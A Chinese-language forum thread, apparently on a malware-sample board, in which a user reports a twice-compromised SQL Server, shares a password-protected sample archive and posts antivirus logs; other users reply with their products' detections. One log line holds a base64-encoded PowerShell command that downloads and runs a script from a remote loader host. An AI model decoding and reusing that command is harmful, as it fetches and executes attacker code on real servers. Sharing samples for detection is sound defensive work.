数据库服务器病毒 8X

显示全部楼层 · 发表于 2022-6-7 10:17:52

本帖最后由 LovelyTim 于 2022-6-7 10:26 编辑

公司托管在华为云的服务器中了两次一样的毒，
两次火绒都提示已拦截或阻止，
但数据库还是被改密码和增加用户了，
怕被拖库（虽然很大可能已经被拖了），准备换KES试试看。
密码 infected

显示全部楼层 · 发表于 2022-6-7 11:14:23

本帖最后由 LovelyTim 于 2022-6-7 11:17 编辑

火绒工程师发表于 2022-6-7 10:59
收到，我们确认下哈

顺便把日志文件也放上来
因为是两次一样的病毒
就只放最新记录

【2】2022-06-06 16:00:15,系统防护,应用加固,sqlservr.exe触犯应用加固规则, 已阻止
防护项目：数据库
操作目标：【执行】 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
操作目标参数：C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe/c -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AbQBzAHMAcQBsAC4AbABvAGEAZABlAHIAMAAxADEAOAAuAHgAeQB6ADoAMQA0ADMAMwAvAG0AcwBzAHEAbAA3AC4AdAB4AHQAJwApADsA
操作结果：已阻止
保护进程路径：D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
保护进程命令行："D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【3】2022-06-06 15:59:28,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
病毒名称：Backdoor/CobaltStrike.l
病毒ID：976F2654168CFB4F
病毒路径：C:\Windows\Temp\TmpA0C0.tmp
操作类型：修改
操作结果：已处理
进程ID：1760
操作进程：D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
操作进程命令行："D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
父进程：C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-06-06 15:59:07,病毒防护,文件实时监控,发现病毒Backdoor/CobaltStrike.l, 已处理
病毒名称：Backdoor/CobaltStrike.l
病毒ID：976F2654168CFB4F
病毒路径：C:\Windows\Temp\Tmp5157.tmp
操作类型：修改
操作结果：已处理
进程ID：1760
操作进程：D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
操作进程命令行："D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
父进程：C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-06-06 15:58:50,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
病毒名称：Backdoor/Meterpreter.ak
病毒ID：A00D08EFDA1AA78C
病毒路径：C:\Windows\Temp\TmpD48.tmp
操作类型：修改
操作结果：已处理
进程ID：1760
操作进程：D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
操作进程命令行："D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
父进程：C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【6】2022-06-06 15:58:46,病毒防护,文件实时监控,发现病毒Backdoor/Meterpreter.ak, 已处理
病毒名称：Backdoor/Meterpreter.ak
病毒ID：A00D08EFDA1AA78C
病毒路径：C:\Windows\Temp\TmpFB07.tmp
操作类型：修改
操作结果：已处理
进程ID：1760
操作进程：D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
操作进程命令行："D:\Program Files (x86)\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" -sMSSQLSERVER
父进程：C:\Windows\System32\services.exe
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

复制代码

显示全部楼层 · 发表于 2022-6-7 10:22:37

SEP kill all

显示全部楼层 · 发表于 2022-6-7 10:24:26

开开心心卖手机发表于 2022-6-7 10:22
SEP kill all

火绒也提示处理了，但数据库密码和用户还是被改了

显示全部楼层 · 发表于 2022-6-7 10:25:21

本帖最后由 Shake2333 于 2022-6-7 10:27 编辑

panda kill all

显示全部楼层 · 发表于 2022-6-7 10:26:05

Avira all

显示全部楼层 · 发表于 2022-6-7 10:26:12

LovelyTim 发表于 2022-6-7 10:24
火绒也提示处理了，但数据库密码和用户还是被改了

尴尬，建议换个重武器上去

显示全部楼层 · 发表于 2022-6-7 10:27:02

卡巴kill all

显示全部楼层 · 发表于 2022-6-7 10:28:00

开开心心卖手机发表于 2022-6-7 10:26
尴尬，建议换个重武器上去

午休再装，现在社畜中

显示全部楼层 · 发表于 2022-6-7 10:28:50

2022-06-07 10:27:48 感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmpd48.tmp
2022-06-07 10:27:48 感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmpfb07.tmp
2022-06-07 10:27:47 感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmp42a2.tmp
2022-06-07 10:27:47 感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmp5157.tmp
2022-06-07 10:27:47 感染型病毒(Win32/HackTool.Meterpreter.HgkASrkA)MD5:b41633dc589b37d7894240f5c48ef332已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmp55ae.tmp
2022-06-07 10:27:47 感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmpa0c0.tmp
2022-06-07 10:27:47 感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmpb9d8.tmp
2022-06-07 10:27:47 感染型病毒(Win32/Trojan.Swrort.HgkASqoA)MD5:77c9692543c3c370ae46f72718a11d4e已删除此文件，如果您发现误删，可从隔离区恢复此文件。 d:\360极速浏览器x下载\infected\tmpc3f.tmp

复制代码

显示全部楼层 · 发表于 2022-6-7 10:30:05

aboringman 发表于 2022-6-7 10:28

杀软是？

[病毒样本] 数据库服务器病毒 8X

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

评分